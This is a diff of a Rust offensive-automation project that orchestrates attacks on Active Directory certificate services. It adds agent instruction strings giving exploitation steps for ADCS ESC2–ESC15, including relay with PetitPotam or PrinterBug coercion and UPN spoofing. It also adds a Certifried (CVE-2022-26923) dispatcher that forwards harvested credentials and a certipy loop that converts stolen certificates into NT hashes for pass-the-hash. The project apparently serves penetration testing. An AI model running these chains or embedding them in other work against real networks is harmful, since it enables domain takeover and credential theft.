+            "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch.\n",
+            "Then use certipy_auth with the resulting .pfx."
+        ),
+        "esc7" => concat!(
+            "ESC7: ManageCA privilege abuse.\n",
+            "Use certipy_esc7_full_chain to execute the full chain: add-officer → request SubCA cert (denied) → issue pending request → retrieve cert → authenticate.\n",
+            "IMPORTANT: Set target to the ca_host IP (CA server, not DC).\n",
+            "IMPORTANT: Include 'sid' param (admin_sid from payload) to avoid SID mismatch in certipy v5.\n",
+            "The tool handles all 5 steps automatically and returns the NT hash."
+        ),
+        "esc9" => concat!(
+            "ESC9: GenericAll on a user allows UPN spoofing.\n",
+            "If you have GenericAll on a user, change their UPN to administrator@<domain>,\n",
+            "request a cert using the modified user, then restore the original UPN.\n",
+            "Use certipy_request (with target=ca_host) then certipy_auth.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip."
+        ),
+        "esc10" => concat!(
+            "ESC10: Weak Certificate Mapping (StrongCertificateBindingEnforcement=0).\n",
+            "The DC does not enforce strong cert-to-account binding.\n",
+            "Use certipy_request with template, ca, target=ca_host, and sid=admin_sid.\n",
+            "The -sid flag embeds the target SID in the cert, bypassing weak mapping.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+            "Then use certipy_auth with the resulting .pfx."
+        ),
+        "esc11" => concat!(
+            "ESC11: RPC relay to ICPR certificate enrollment (IF_ENFORCEENCRYPTICERTREQUEST disabled).\n",
+            "Use certipy_relay with target='rpc://<CA_IP>' and ca=<CA name>.\n",
+            "This starts a relay listener that accepts coerced NTLM auth and relays it\n",
+            "to the CA's RPC enrollment endpoint to obtain a certificate.\n",
+            "Combine with coercion (PetitPotam, PrinterBug) to trigger auth from a DC.\n",
+            "After relay captures a cert, use certipy_auth with the .pfx."
+        ),
+        "esc13" => concat!(
+            "ESC13: Issuance Policy linked to a group.\n",
+            "Use certipy_request with the ESC13 template and target=ca_host.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+            "Then use certipy_auth with the resulting .pfx."
+        ),
+        "esc15" => concat!(
+            "ESC15 (CVE-2024-49019): Application policy OID abuse.\n",
+            "Use certipy_request with template, ca, target=ca_host,\n",
+            "and application_policies=<OID> (e.g. '1.3.6.1.5.5.7.3.2' for Client Authentication).\n",
+            "The application policy OID overrides the template's EKU restrictions.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+            "Then use certipy_auth with the resulting .pfx."
+        ),
+        _ => "Use certipy_request with the template and CA, then certipy_auth with the .pfx. Set target to ca_host.",
+    }
+}
+
@@ -319,7 +607,13 @@ struct AdcsExploitWork {
     ca_host: Option<String>,
     domain: String,
     dc_ip: Option<String>,
+    domain_sid: Option<String>,
     credential: Option<ares_core::models::Credential>,
+    /// Tier-ordered coerce target candidates (esc8/esc11 only). Empty for
+    /// non-coercion ESC types. The dispatcher passes the first as
+    /// `coerce_target` (legacy) and the full list as `coerce_targets` so the
+    /// agent can iterate when the first target's callback drifts.
+    coerce_candidates: Vec<String>,
 }
 
 #[cfg(test)]
@@ -353,11 +647,29 @@ mod tests {
     #[test]
     fn is_exploitable_esc_type_positive() {
         assert!(is_exploitable_esc_type("esc1"));
+        assert!(is_exploitable_esc_type("esc2"));
+        assert!(is_exploitable_esc_type("esc3"));
         assert!(is_exploitable_esc_type("esc4"));
+        assert!(is_exploitable_esc_type("esc6"));
+        assert!(is_exploitable_esc_type("esc7"));
         assert!(is_exploitable_esc_type("esc8"));
+        assert!(is_exploitable_esc_type("esc9"));
+        assert!(is_exploitable_esc_type("esc10"));
+        assert!(is_exploitable_esc_type("esc11"));
+        assert!(is_exploitable_esc_type("esc13"));
+        assert!(is_exploitable_esc_type("esc15"));
         assert!(is_exploitable_esc_type("adcs_esc1"));
+        assert!(is_exploitable_esc_type("adcs_esc2"));
+        assert!(is_exploitable_esc_type("adcs_esc3"));
         assert!(is_exploitable_esc_type("adcs_esc4"));
+        assert!(is_exploitable_esc_type("adcs_esc6"));
+        assert!(is_exploitable_esc_type("adcs_esc7"));
         assert!(is_exploitable_esc_type("adcs_esc8"));
+        assert!(is_exploitable_esc_type("adcs_esc9"));
+        assert!(is_exploitable_esc_type("adcs_esc10"));
+        assert!(is_exploitable_esc_type("adcs_esc11"));
+        assert!(is_exploitable_esc_type("adcs_esc13"));
+        assert!(is_exploitable_esc_type("adcs_esc15"));
     }
 
     #[test]
@@ -370,13 +682,13 @@ mod tests {
 
     #[test]
     fn is_exploitable_esc_type_negative() {
-        assert!(!is_exploitable_esc_type("esc2"));
-        assert!(!is_exploitable_esc_type("esc3"));
+        assert!(!is_exploitable_esc_type("esc5"));
+
assert!(!is_exploitable_esc_type("esc14")); assert!(!is_exploitable_esc_type("rbcd")); assert!(!is_exploitable_esc_type("shadow_credentials")); assert!(!is_exploitable_esc_type("genericall")); assert!(!is_exploitable_esc_type("")); - assert!(!is_exploitable_esc_type("adcs_esc2")); + assert!(!is_exploitable_esc_type("adcs_esc5")); } // normalize_esc_type @@ -709,6 +1021,11 @@ mod tests { assert_eq!(role_for_esc_type("esc8"), "coercion"); } + #[test] + fn role_for_esc11_is_coercion() { + assert_eq!(role_for_esc_type("esc11"), "coercion"); + } + #[test] fn role_for_esc1_is_privesc() { assert_eq!(role_for_esc_type("esc1"), "privesc"); @@ -719,6 +1036,16 @@ mod tests { assert_eq!(role_for_esc_type("esc4"), "privesc"); } + #[test] + fn role_for_esc10_is_privesc() { + assert_eq!(role_for_esc_type("esc10"), "privesc"); + } + + #[test] + fn role_for_esc15_is_privesc() { + assert_eq!(role_for_esc_type("esc15"), "privesc"); + } + #[test] fn role_for_unknown_defaults_to_privesc() { assert_eq!(role_for_esc_type("esc99"), "privesc"); @@ -830,4 +1157,130 @@ mod tests { ); assert_eq!(extract_account_name(&details), None); } + + // pick_coerce_targets + + fn windows_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: "Windows Server 2019".to_string(), + roles: Vec::new(), + services: vec!["microsoft-ds".to_string()], + is_dc: false, + owned: false, + } + } + + fn dc_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: "Windows Server 2019".to_string(), + roles: Vec::new(), + services: vec!["microsoft-ds".to_string()], + is_dc: true, + owned: false, + } + } + + fn linux_host(ip: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: format!("linux-{ip}"), + os: "Ubuntu 22.04".to_string(), + roles: Vec::new(), + services: vec!["ssh".to_string()], + 
is_dc: false, + owned: false, + } + } + + #[test] + fn pick_coerce_targets_prefers_vuln_domain_dc() { + let dcs: HashMap = + [("contoso.local".to_string(), "192.168.58.20".to_string())] + .into_iter() + .collect(); + let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &[]); + assert_eq!(out, vec!["192.168.58.20".to_string()]); + } + + #[test] + fn pick_coerce_targets_excludes_ca_host() { + let dcs: HashMap = + [("contoso.local".to_string(), "192.168.58.10".to_string())] + .into_iter() + .collect(); + let out = pick_coerce_targets( + Some("192.168.58.10"), + Some("192.168.58.10"), + &dcs, + &[windows_host("192.168.58.10", "ca-and-dc")], + ); + assert!(out.is_empty(), "CA host must not appear: {out:?}"); + } + + #[test] + fn pick_coerce_targets_falls_back_to_member_servers() { + let dcs: HashMap = + [("contoso.local".to_string(), "192.168.58.10".to_string())] + .into_iter() + .collect(); + let hosts = vec![ + dc_host("192.168.58.10", "dc01"), + windows_host("192.168.58.51", "ws01"), + linux_host("192.168.58.99"), + ]; + let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.10"), &dcs, &hosts); + // CA excluded; only Windows non-DC member server remains. + assert_eq!(out, vec!["192.168.58.51".to_string()]); + } + + #[test] + fn pick_coerce_targets_orders_dc_then_other_dcs_then_members() { + let dcs: HashMap = [ + ("contoso.local".to_string(), "192.168.58.20".to_string()), + ("fabrikam.local".to_string(), "192.168.58.30".to_string()), + ] + .into_iter() + .collect(); + let hosts = vec![windows_host("192.168.58.51", "ws01")]; + let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &hosts); + // Tier 1 (vuln-domain DC) first. + assert_eq!(out[0], "192.168.58.20"); + // Tier 2 (other DC) and Tier 3 (member) both present, no CA. 
+        assert!(out.contains(&"192.168.58.30".to_string()));
+        assert!(out.contains(&"192.168.58.51".to_string()));
+        assert!(!out.contains(&"192.168.58.10".to_string()));
+    }
+
+    #[test]
+    fn pick_coerce_targets_dedups_dc_appearing_in_hosts_list() {
+        let dcs: HashMap<String, String> =
+            [("contoso.local".to_string(), "192.168.58.20".to_string())]
+                .into_iter()
+                .collect();
+        let hosts = vec![dc_host("192.168.58.20", "dc01")];
+        let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &hosts);
+        assert_eq!(out, vec!["192.168.58.20".to_string()]);
+    }
+
+    #[test]
+    fn pick_coerce_targets_ca_match_is_case_insensitive() {
+        let dcs: HashMap<String, String> = HashMap::new();
+        let hosts = vec![windows_host("DC01.contoso.local", "dc01")];
+        let out = pick_coerce_targets(Some("dc01.contoso.local"), None, &dcs, &hosts);
+        assert!(
+            out.is_empty(),
+            "CA hostname (case-mismatched) must be excluded"
+        );
+    }
+
+    #[test]
+    fn pick_coerce_targets_empty_when_no_inputs() {
+        let dcs: HashMap<String, String> = HashMap::new();
+        let out = pick_coerce_targets(Some("192.168.58.10"), None, &dcs, &[]);
+        assert!(out.is_empty());
+    }
 }
diff --git a/ares-cli/src/orchestrator/automation/bloodhound.rs b/ares-cli/src/orchestrator/automation/bloodhound.rs
index 8b805cea..f2c1342c 100644
--- a/ares-cli/src/orchestrator/automation/bloodhound.rs
+++ b/ares-cli/src/orchestrator/automation/bloodhound.rs
@@ -40,7 +40,7 @@ pub async fn auto_bloodhound(dispatcher: Arc<Dispatcher>, mut shutdown: watch::R
         .iter()
         .filter(|d| !state.is_processed(DEDUP_BLOODHOUND_DOMAINS, d))
         .filter_map(|domain| {
-            let dc_ip = state.domain_controllers.get(domain).cloned()?;
+            let dc_ip = state.resolve_dc_ip(domain)?;
             // Select best credential for this specific domain
             let cred = find_domain_credential(
                 domain,
diff --git a/ares-cli/src/orchestrator/automation/certifried.rs b/ares-cli/src/orchestrator/automation/certifried.rs
new file mode 100644
index 00000000..ed15806d
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/certifried.rs
@@ -0,0 +1,485 @@
+//! auto_certifried -- CVE-2022-26923 machine account DNS hostname spoofing.
+//!
+//! Certifried abuses the fact that machine accounts can enroll for certificates
+//! and that the DNS hostname in the certificate is derived from the machine
+//! account's dNSHostName attribute. By creating a machine account and setting
+//! its dNSHostName to a DC's hostname, you can obtain a certificate that
+//! authenticates as the DC.
+//!
+//! Prerequisites:
+//! - MachineAccountQuota > 0 (default 10)
+//! - Valid domain credential
+//! - ADCS CA discovered
+//!
+//! Dispatches to "privesc" role with technique "certifried".
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect certifried work items from current state.
+///
+/// Pure logic extracted from `auto_certifried` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_certifried_work(state: &StateInner) -> Vec<CertifriedWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for (domain, dc_ip) in &state.all_domains_with_dcs() {
+        let dedup_key = format!("certifried:{}", domain.to_lowercase());
+        if state.is_processed(DEDUP_CERTIFRIED, &dedup_key) {
+            continue;
+        }
+
+        // Find the DC host to get its hostname for spoofing
+        let dc_hostname = state
+            .hosts
+            .iter()
+            .find(|h| h.ip == *dc_ip && h.is_dc)
+            .map(|h| h.hostname.clone())
+            .filter(|h| !h.is_empty());
+
+        // Certifried creates a machine account in the TARGET domain via MAQ.
+        // Cross-forest credentials cannot create machine accounts in a foreign
+        // forest, so require a credential whose domain matches the target.
+        let cred = match state.credentials.iter().find(|c| {
+            c.domain.to_lowercase() == domain.to_lowercase()
+                && !c.password.is_empty()
+                && !state.is_credential_quarantined(&c.username, &c.domain)
+        }) {
+            Some(c) => c.clone(),
+            None => continue,
+        };
+
+        items.push(CertifriedWork {
+            dedup_key,
+            domain: domain.clone(),
+            dc_ip: dc_ip.clone(),
+            dc_hostname,
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+/// Dispatches certifried (CVE-2022-26923) per domain with ADCS.
+/// Interval: 45s.
+pub async fn auto_certifried(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("certifried") {
+            continue;
+        }
+
+        let work = {
+            let state = dispatcher.state.read().await;
+            collect_certifried_work(&state)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "certifried",
+                "cve": "CVE-2022-26923",
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "dc_hostname": item.dc_hostname,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("certifried");
+            match dispatcher
+                .throttled_submit("exploit", "privesc", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        domain = %item.domain,
+                        dc = %item.dc_ip,
+                        "Certifried (CVE-2022-26923) dispatched"
+                    );
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_CERTIFRIED, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_CERTIFRIED, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(domain = %item.domain, "Certifried deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, domain = %item.domain, "Failed to dispatch certifried");
+                }
+            }
+        }
+    }
+}
+
+struct CertifriedWork {
+    dedup_key: String,
+    domain: String,
+    dc_ip: String,
+    dc_hostname: Option<String>,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use ares_core::models::{Credential, Host};
+
+    fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+        Credential {
+            id: format!("c-{username}"),
+            username: username.into(),
+            password: password.into(), // pragma: allowlist secret
+            domain: domain.into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        }
+    }
+
+    fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host {
+        Host {
+            ip: ip.into(),
+            hostname: hostname.into(),
+            os: String::new(),
+            roles: Vec::new(),
+            services: Vec::new(),
+            is_dc,
+            owned: false,
+        }
+    }
+
+    // --- collect_certifried_work tests ---
+
+    #[test]
+    fn collect_empty_state_returns_no_work() {
+        let state = StateInner::new("test-op".into());
+        let work = collect_certifried_work(&state);
+        assert!(work.is_empty());
+    }
+
+    #[test]
+    fn collect_no_credentials_returns_no_work() {
+        let mut state = StateInner::new("test-op".into());
+        state
+            .domain_controllers
+            .insert("contoso.local".into(), "192.168.58.10".into());
+        let work = collect_certifried_work(&state);
+        assert!(work.is_empty());
+    }
+
+    #[test]
+    fn collect_single_domain_produces_work() {
+        let mut state = StateInner::new("test-op".into());
+        state
+            .domain_controllers
+            .insert("contoso.local".into(), "192.168.58.10".into());
+        state
+            .credentials
+            .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+        let work = collect_certifried_work(&state);
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].domain, "contoso.local");
+        assert_eq!(work[0].dc_ip, "192.168.58.10");
+        assert_eq!(work[0].dedup_key, "certifried:contoso.local");
+        assert_eq!(work[0].credential.username, "admin");
+ } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_CERTIFRIED, "certifried:contoso.local".into()); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dc_hostname_resolved_from_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_hostname, Some("dc01.contoso.local".into())); + } + + #[test] + fn collect_dc_hostname_none_when_no_host_match() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + 
state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].dc_hostname.is_none()); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_when_only_cross_forest_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + // Certifried needs a target-domain credential to create a machine + // account in the target forest; cross-forest creds cannot do this. 
+ let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_empty_password_credentials() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "certifried:contoso.local"); + } + + #[test] + fn dedup_key_format() { + let key = format!("certifried:{}", "contoso.local"); + assert_eq!(key, "certifried:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("certifried:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "certifried:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_CERTIFRIED, "certifried"); + } + + #[test] + fn dc_hostname_from_hosts() { + // Simulates finding a DC hostname from hosts list + let hostname = "dc01.contoso.local"; + let filtered = Some(hostname.to_string()).filter(|h| !h.is_empty()); + assert_eq!(filtered, 
Some("dc01.contoso.local".to_string())); + + let empty = Some("".to_string()).filter(|h| !h.is_empty()); + assert!(empty.is_none()); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = serde_json::json!({ + "technique": "certifried", + "cve": "CVE-2022-26923", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "dc_hostname": "dc01.contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "certifried"); + assert_eq!(payload["cve"], "CVE-2022-26923"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["dc_hostname"], "dc01.contoso.local"); + } + + #[test] + fn payload_without_dc_hostname() { + let payload = serde_json::json!({ + "technique": "certifried", + "cve": "CVE-2022-26923", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "dc_hostname": null, + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert!(payload["dc_hostname"].is_null()); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = CertifriedWork { + dedup_key: "certifried:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + dc_hostname: Some("dc01.contoso.local".into()), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); 
+ assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dc_hostname, Some("dc01.contoso.local".into())); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn work_struct_without_hostname() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = CertifriedWork { + dedup_key: "certifried:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + dc_hostname: None, + credential: cred, + }; + assert!(work.dc_hostname.is_none()); + } +} diff --git a/ares-cli/src/orchestrator/automation/certipy_auth.rs b/ares-cli/src/orchestrator/automation/certipy_auth.rs new file mode 100644 index 00000000..af498b33 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/certipy_auth.rs @@ -0,0 +1,749 @@ +//! auto_certipy_auth -- authenticate using obtained certificates. +//! +//! After ADCS exploitation (ESC1/ESC4/ESC8) obtains a certificate (.pfx), +//! this automation dispatches `certipy auth` to convert the certificate +//! into an NT hash, enabling pass-the-hash for the impersonated user. +//! +//! Watches for `certificate_obtained` vulnerability type in discovered_vulnerabilities +//! which is registered by the ADCS exploitation result processor. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Authenticates with obtained certificates to extract NT hashes. +/// Interval: 30s. 
+pub async fn auto_certipy_auth(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(30));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("certipy_auth") {
+            continue;
+        }
+
+        let work: Vec<CertAuthWork> = {
+            let state = dispatcher.state.read().await;
+            collect_cert_auth_work(&state)
+        };
+
+        for item in work {
+            let mut payload = json!({
+                "technique": "certipy_auth",
+                "vuln_id": item.vuln_id,
+                "pfx_path": item.pfx_path,
+                "domain": item.domain,
+                "target_user": item.target_user,
+            });
+
+            if let Some(ref dc) = item.dc_ip {
+                payload["target_ip"] = json!(dc);
+                payload["dc_ip"] = json!(dc);
+            }
+
+            let priority = dispatcher.effective_priority("certipy_auth");
+            match dispatcher
+                .throttled_submit("credential_access", "credential_access", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        vuln_id = %item.vuln_id,
+                        user = %item.target_user,
+                        "Certificate authentication dispatched"
+                    );
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_CERTIPY_AUTH, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_CERTIPY_AUTH, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(vuln_id = %item.vuln_id, "Certificate auth deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, vuln_id = %item.vuln_id, "Failed to dispatch cert auth");
+                }
+            }
+        }
+    }
+}
+
+/// Pure logic extracted from `auto_certipy_auth` so it can be unit-tested without
+/// needing a `Dispatcher` or async runtime (beyond state construction).
+fn collect_cert_auth_work(state: &crate::orchestrator::state::StateInner) -> Vec<CertAuthWork> {
+    state
+        .discovered_vulnerabilities
+        .values()
+        .filter_map(|vuln| {
+            let vtype = vuln.vuln_type.to_lowercase();
+            if vtype != "certificate_obtained" && vtype != "adcs_certificate" {
+                return None;
+            }
+
+            if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+                return None;
+            }
+
+            let dedup_key = format!("cert_auth:{}", vuln.vuln_id);
+            if state.is_processed(DEDUP_CERTIPY_AUTH, &dedup_key) {
+                return None;
+            }
+
+            let pfx_path = vuln
+                .details
+                .get("pfx_path")
+                .or_else(|| vuln.details.get("certificate_path"))
+                .or_else(|| vuln.details.get("cert_file"))
+                .and_then(|v| v.as_str())
+                .map(|s| s.to_string())?;
+
+            let domain = vuln
+                .details
+                .get("domain")
+                .and_then(|v| v.as_str())
+                .unwrap_or("")
+                .to_string();
+
+            let target_user = vuln
+                .details
+                .get("target_user")
+                .or_else(|| vuln.details.get("upn"))
+                .or_else(|| vuln.details.get("account_name"))
+                .and_then(|v| v.as_str())
+                .unwrap_or("administrator")
+                .to_string();
+
+            let dc_ip = state
+                .domain_controllers
+                .get(&domain.to_lowercase())
+                .cloned();
+
+            Some(CertAuthWork {
+                vuln_id: vuln.vuln_id.clone(),
+                dedup_key,
+                pfx_path,
+                domain,
+                target_user,
+                dc_ip,
+            })
+        })
+        .collect()
+}
+
+struct CertAuthWork {
+    vuln_id: String,
+    dedup_key: String,
+    pfx_path: String,
+    domain: String,
+    target_user: String,
+    dc_ip: Option<String>,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("cert_auth:{}", "vuln-cert-001");
+        assert_eq!(key, "cert_auth:vuln-cert-001");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_CERTIPY_AUTH, "certipy_auth");
+    }
+
+    #[test]
+    fn cert_vuln_types_accepted() {
+        let types = [
+            "certificate_obtained",
+            "adcs_certificate",
+            "CERTIFICATE_OBTAINED",
+        ];
+        for t in &types {
+            let lower = t.to_lowercase();
+            assert!(
+                lower == "certificate_obtained" || lower == "adcs_certificate",
+                "{t} should match"
+            );
+ } + } + + #[test] + fn non_cert_vuln_types_rejected() { + let non_cert = ["esc1", "smb_signing_disabled", "mssql_access"]; + for t in &non_cert { + let lower = t.to_lowercase(); + assert!(lower != "certificate_obtained" && lower != "adcs_certificate"); + } + } + + #[test] + fn pfx_path_fallback_chain() { + // Primary key + let details = serde_json::json!({"pfx_path": "/tmp/cert.pfx"}); + let path = details + .get("pfx_path") + .or_else(|| details.get("certificate_path")) + .or_else(|| details.get("cert_file")) + .and_then(|v| v.as_str()); + assert_eq!(path, Some("/tmp/cert.pfx")); + + // Fallback to certificate_path + let details2 = serde_json::json!({"certificate_path": "/tmp/alt.pfx"}); + let path2 = details2 + .get("pfx_path") + .or_else(|| details2.get("certificate_path")) + .or_else(|| details2.get("cert_file")) + .and_then(|v| v.as_str()); + assert_eq!(path2, Some("/tmp/alt.pfx")); + + // Fallback to cert_file + let details3 = serde_json::json!({"cert_file": "/tmp/other.pfx"}); + let path3 = details3 + .get("pfx_path") + .or_else(|| details3.get("certificate_path")) + .or_else(|| details3.get("cert_file")) + .and_then(|v| v.as_str()); + assert_eq!(path3, Some("/tmp/other.pfx")); + + // No key returns None + let details4 = serde_json::json!({}); + let path4 = details4 + .get("pfx_path") + .or_else(|| details4.get("certificate_path")) + .or_else(|| details4.get("cert_file")) + .and_then(|v| v.as_str()); + assert!(path4.is_none()); + } + + #[test] + fn target_user_fallback() { + let details = serde_json::json!({"target_user": "admin"}); + let user = details + .get("target_user") + .or_else(|| details.get("upn")) + .or_else(|| details.get("account_name")) + 